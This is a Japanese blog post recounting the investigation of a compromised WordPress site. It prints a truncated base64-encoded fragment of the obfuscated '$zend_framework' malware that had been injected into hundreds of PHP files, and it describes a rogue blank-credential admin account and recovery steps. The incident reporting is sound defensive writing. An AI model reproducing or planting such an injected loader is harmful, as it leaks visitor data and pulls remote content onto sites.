WordPressに潜む怪しい影
ちょっと関わりのあるサイトで、WordPressの管理画面がおかしいというので調査をしました。
入って見ると管理画面のレイアウトが崩れています。
またプラグインがうまく認識されてないのか、プラグイン一覧が空白になってます。
とりあえずサイトにFTPで繋いで、wp-config.phpの上の方に
を足すと管理画面の崩れはなおりました。でもプラグインはあいかわらず空っぽのままです。
しかし/wp-content/plugins/を確認してみると、プラグインはちゃんとあります。パーミッションも問題ないようです。
もっかいwp-config.phpを確認してみます。
・・・・
よく見ると、冒頭に見慣れぬ行が入ってます。
Hg2NlwxNjVceDZlXDE0M1x4NzRcMTUxXHg2ZlwxNTZceDVmXDE0NVx4NzhcMTUxXHg3M1wxNjRceDczIjsgJGV2YTFmWTJiYWwxY3owaXIgPSAiXHg2ZlwxNDJceDVmXDE2M1x4NzRcMTQxXHg3MlwxN
jQiOyAkZXZhMWZZMmJhbDFjejhpciA9ICJceDYzXDE1N1x4NjRcMTQ1XHg3OFw2Mlx4MzIiOyBpZigkZXZhMWZZMmJhazFjejBpcigkZXZhMWZZMmJhbDFjejBpcikgJiYgIWlzc2V0KCRHTE9CQUxTW
yRldmExZlkyYmFsMWN6OGlyXSkpIHsNCgkkR0xPQkFMU1skZXZhMWZZMmJhbDFjejhpcl09MTsgCWlmKCEkZXZhMWZZMmJhazFjejBpcigiXHg2NVwxNjZceDYxXDYxXHg2NlwxMzFceDMyXDE0Mlx4N
jFcMTUzXHgzMVwxNDNceDU2XDYyXHg2OVwxNjIiKSkgeyBpZighJGV2YTFmWTJiYWsxY3owaXIoIlx4NjVcMTY2XHg2MVw2MVx4NjZcMTMxXHgzMlwxNDJceDYxXDE1M1x4MzFcMTQzXHg1Nlw2MFx4N
jlcMTYyIikpIHsNCiBmdW5jdGlvbiBldmExZlkyYmFrMWNWMGlyKCkgew0KIC8vZWNobyBzdGFydA0KDQogaWYoIWlzc2V0KCRHTE9CQUxTWyJhZ2hleDAiXSkpIHsNCgkkR0xPQkFMU1siYWdoZXgwI
l09MTsNCiAkZXZhbHNzc2dxdWxWQlRrWkxBY2ggPSAiIjsNCiBpZiAoIWlzc2V0KCRldmExZllsYmFrQmNWU2lyKSkgeyRldmExZllsYmFrQmNWU2lyID0gIjdreUo3a1NLaW9EVFdWV2VSQjNUaWNpT
DFVamNtUmlMbjRTS2lBRVRzOTBjdVpsVHo1bVJPdEhXSGRXZlJ0MFp1cG1WUk5UVTJZMk1WWmtUOGgxUm4xWFVMZG1icXhHVTdoMVJuMVhVTGRtYnFaVlV6RWxObU5UVkd4RWVOdDFaemtGY21KeUp1V
VROeVpHSnVjaUx4azJjd1JDTGlJQ0t1VkhkbEpISm40U055a2….. (だらだらと文字列が続く)…..\42\x29\51\x3b\57\x2f”); ?>
あり?zend frameworkなんて使ってたっけ(・ω・`
・・・(思考停止)
あ
なんじゃこりゃー(・ω・`
やられてました。いつの間にかなんか変なコードを埋め込まれてます。
とりあえずSSHでサーバーにログインし、findコマンド叩いてどれくらいやられてるか調査します。
うわあ(^ω^;
出てくる出てくらわうぇあfっがg
WordPressの管理モジュール等も含め、数百のPHPファイルの冒頭にかたっぱしからこの$zend_frameworkと文字列が入っていましたorz
どっからやられたんだ・・・
更に調べると、とりあえず感染しているのはPHPファイルだけのようです。
感染ファイルのタイムスタンプは、以前作業した日とほぼ同じで特に怪しい感じはしない気がします。
サーバーのログも洗ったのですが、FTP、SSHのアクセス履歴に怪しい箇所はありません。
とすると、wordpressの管理画面経由からパスワード総当たりで入られたか、元来の脆弱性を突かれたのでしょうか。
・・・wordpressの管理ユーザーに、ユーザー名とパスワードが空白の人が追加されていました^^;
やっぱり管理画面からやられたのでしょうか。でもWordPressに含まれていないPHPソースもやられてるので確証は持てません。
他にも同様の事例がないか調べてみると、このような記事がありました。
この記事で埋め込まれたコードはこちらのものとほぼ同じです。
また記事内でこの文字列をデコードしたものも公開していますが、
自分が調査中の感染を(中途半端ながら)デコードしてみたものとこれまたほぼ同じでした。おそらく同一発信源と思われます。
んで肝心のこの埋め込まれたブツが何をするかなのですが、上記のサイトの説明を参照させてもらうと
どうやらIPやユーザーエージェントなどアクセスユーザーの環境情報を外部サイトに送り、その結果「なんか」を
ひっぱってくるそうです。
そしてなにを引っぱってくるのかは怖くて詳しく確認できませんでしたw
なお外部サイトはIPでなくドメイン名で指定されています。caドメインなのでカナダのサーバーですね。
んでカナダのwhoisで確認すると、ドメイン登録者のメールアドレスはロシアになっています。
記事のコメント欄を見ると、ハロードリープラグインが怪しい、いや怪しくない、管理画面からパスワード総当たりされた等不確定な情報が飛び交っています。
一応/wp-content/plugins/フォルダを確認してみると、確かに怪しいタイムスタンプで感染コードとハロードリープラグインが書かれたindex.phpが置いてありました。
あながち関係あるのかな^^;
まだ感染路や影響範囲が完全にはわからないので、さしあたり応急策ということになりますが、
記事主の方は、もし感染したらとりあえず感染してないバックアップから復旧させるか、無理なら手作業で感染箇所を探して削除していくことと、
またwordpressのプラグインが全て最新か確認することを推奨しています。
wordpressを使用している皆様は是非一度ソース内のPHPファイルを確認されることをお勧めします。
売り上げランキング: 11,284
コメントを残す